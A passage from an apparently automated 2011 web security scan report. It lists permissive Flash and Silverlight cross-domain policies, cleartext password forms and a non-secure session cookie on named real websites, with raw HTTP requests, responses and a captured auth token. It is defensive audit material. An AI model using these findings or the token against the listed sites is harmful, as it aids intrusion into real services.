<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admin6.testandtarget.omniture.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin6.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:21:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=C65CAE406CB199739E142186AC7C21A1; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.123. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:19:23 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.124. https://docs.google.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 19:29:21 GMT
Date: Sat, 03 Sep 2011 19:29:21 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 21186

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-rbc.bidder7.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:09 GMT
ETag: "3cd8207-116-4ab73f18d4a40"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

6.126. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:53 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:54:53 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.127. http://www.traffic.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traffic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.traffic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
Last-Modified: Wed, 22 Apr 2009 22:26:16 GMT
ETag: "a4b03-9d-4682c40737200"
Accept-Ranges: bytes
Content-Length: 157
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.wfaa.com" />
</cross-domain-policy>

7. Silverlight cross-domain policy previous next
There are 13 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://content.usatoday.com/clientaccesspolicy.xml
http://metrics.sprint.com/clientaccesspolicy.xml
http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml
http://pixel.quantserve.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://usatoday1.112.2o7.net/clientaccesspolicy.xml
http://video.od.visiblemeasures.com/clientaccesspolicy.xml
http://www.goutsa.com/clientaccesspolicy.xml
http://www.tulsaworld.com/clientaccesspolicy.xml
http://www.usatoday.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://content.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

7.4. http://metrics.sprint.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmcharlotte.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:25 GMT
Server: Omniture DC/2.0.0
xserver: www86
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.7. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:23:13 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 1293
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www172
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.od.visiblemeasures.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: video.od.visiblemeasures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:23 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Wed, 09 Mar 2011 01:34:37 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from>
               <domain uri="*" />
           </allow-from>
<grant-to>
<r
...[SNIP]...

7.11. http://www.goutsa.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.goutsa.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

7.12. http://www.tulsaworld.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tulsaworld.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.tulsaworld.com

Response

HTTP/1.1 200 OK
Content-Length: 319
Content-Type: text/xml
Last-Modified: Fri, 26 Nov 2010 22:31:11 GMT
Accept-Ranges: bytes
ETag: "88a3a1a0b98dcb1:277"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:24 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.13. http://www.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:33 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

8. Cleartext submission of password previous next
There are 8 instances of this issue:

http://digg.com/submit
http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html
http://www.ispsports.com/radio-network-affiliates.cfm
http://www.sacbee.com/reg-bin/int.cgi
http://www.sacbee.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foxsportssouthwest.com
Path:	/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

The form contains the following password field:

login_password

Request

GET /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.3. http://www.ispsports.com/radio-network-affiliates.cfm previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ispsports.com
Path:	/radio-network-affiliates.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ispsports.com/affiliate-employee-login.cfm

The form contains the following password field:

password

Request

GET /radio-network-affiliates.cfm HTTP/1.1
Host: www.ispsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:26:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</h5>

       <form id="login" action="affiliate-employee-login.cfm" method="post">
           <div id="username">
...[SNIP]...
</label>
               <input id="password_field" type="password" name="password" title="Password" value="" tabindex="2" />
           </div>
...[SNIP]...

8.4. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sacbee.com/reg-bin/int.cgi

The form contains the following password fields:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
gs: new
...[SNIP]...
<br />

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()">

<input type="hidden" name="mode" value="register_done" />
...[SNIP]...
<td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value=""></td>
...[SNIP]...
<td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value=""></td>
...[SNIP]...

8.5. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sacbee.com/reg-bin/int.cgi

The form contains the following password field:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
gs: new
...[SNIP]...
</h3>
<form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post">
<input type="hidden" name="mode" value="login_done" />
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" size="25" class="miregtext">
<input type="image" id="signin-button" src="/static/images/signin-button.png" value="Sign In" />
...[SNIP]...

8.6. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password field:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
</h3>
<form name="LoginForm" action="/reg-bin/int.cgi" method=post>
<input type="hidden" name="mode" value="login_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregtext" value="">
<p class="form-notif">
...[SNIP]...

8.7. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password fields:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration">
<input type="hidden" name="mode" value="register_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value="">
</div>
...[SNIP]...
</label>
<input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value="">
</div>
...[SNIP]...

8.8. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password field:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
<div class="login-form">
<form method="post" action="/reg-bin/int.cgi">
<input type="hidden" value="login_done" name="mode"/>
...[SNIP]...
</label>
<input type="password" class="text" name="password" />

...[SNIP]...

9. SSL cookie without secure flag set previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

